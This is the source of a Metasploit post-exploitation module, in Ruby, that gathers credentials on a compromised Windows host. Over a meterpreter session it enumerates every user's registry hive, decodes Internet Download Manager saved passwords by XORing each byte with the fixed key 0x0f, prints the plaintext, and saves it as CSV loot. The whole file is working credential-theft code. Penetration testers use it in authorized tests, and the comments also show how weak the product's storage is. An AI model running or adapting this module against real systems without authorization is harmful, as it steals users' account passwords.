GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/idm.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
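class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  # IDM "protects" the stored password by XORing every byte with this single
  # constant key. That is obfuscation, not encryption: anyone who can read the
  # registry value can recover the plaintext, which is exactly what this
  # module does.
  IDM_XOR_KEY = 0x0f

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',
        'Description' => %q{
          This module recovers the saved premium download account passwords from
          Internet Download Manager (IDM). These passwords are stored in an encoded
          format in the registry. This module traverses through these registry entries
          and decodes them. Thanks to the template code of theLightCosine's CoreFTP
          password module.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ]
      )
    )
  end

  # Walks every loaded user hive under HKU, decodes each IDM password entry it
  # finds, prints it, and stores all recovered credentials as a single CSV loot.
  #
  # Fixes relative to the original implementation:
  #  * a user without IDM no longer aborts the whole run (`next`, not `return`),
  #    so every loaded hive is inspected;
  #  * loot is written once after the loop instead of once per user, so earlier
  #    users' rows are not duplicated into later loot files;
  #  * only StandardError is rescued, so interrupts and fatal errors propagate.
  def run
    creds = Rex::Text::Table.new(
      'Header' => 'Internet Downloader Manager Credentials',
      'Indent' => 1,
      'Columns' => ['User', 'Password', 'Site']
    )
    found = 0

    # registry_enumkeys may yield nil on a failed read; treat that as "no hives".
    (registry_enumkeys('HKU') || []).each do |sid|
      # Only real user hives (S-1-5-21-...), skipping the per-user *_Classes hives.
      next unless sid.include?('S-1-5-21')
      next if sid.include?('_Classes')

      print_status("Looking at Key #{sid}")

      begin
        found += gather_for_user(sid, creds)
      rescue ::StandardError => e
        # Keep going: a failure in one user's hive must not abort the others.
        print_error("An error has occurred: #{e}")
      end
    end

    if found.zero?
      print_status('No IDM credentials found.')
      return
    end

    print_status('Storing data...')
    path = store_loot(
      'idm.user.creds',
      'text/csv',
      session,
      creds.to_csv,
      'idm_user_creds.csv',
      'Internet Download Manager User Credentials'
    )
    print_good("IDM user credentials saved in: #{path}")
  end

  # Decodes an IDM EncPassword blob by XORing every byte with IDM_XOR_KEY.
  # XOR is its own inverse, so the same call also re-encodes a plaintext.
  #
  # @param ciphertext [String] raw bytes of the EncPassword registry value
  # @return [String] the decoded password bytes
  def xor(ciphertext)
    ciphertext.unpack('C*').map { |byte| byte ^ IDM_XOR_KEY }.pack('C*')
  end

  private

  # Reads the IDM password entries stored under one user's hive and appends
  # every decodable entry to +creds+.
  #
  # @param sid [String] the HKU subkey (user SID) to inspect
  # @param creds [Rex::Text::Table] table receiving [user, password, site] rows
  # @return [Integer] number of entries appended
  def gather_for_user(sid, creds)
    base = "HKU\\#{sid}\\Software\\DownloadManager\\Passwords"
    sites = registry_enumkeys("#{base}\\")
    if sites.nil? || sites.empty?
      print_status('IDM not installed for this user.')
      return 0
    end

    count = 0
    sites.each do |site|
      user = registry_getvaldata("#{base}\\#{site}", 'User')
      epass = registry_getvaldata("#{base}\\#{site}", 'EncPassword')
      # Compare against '' rather than calling #empty? — the value type is not
      # guaranteed to be a String if the key is malformed.
      next if epass.nil? || epass == ''

      pass = xor(epass)
      print_good("Site: #{site} (User=#{user}, Password=#{pass})")
      creds << [user, pass, site]
      count += 1
    end
    count
  end
end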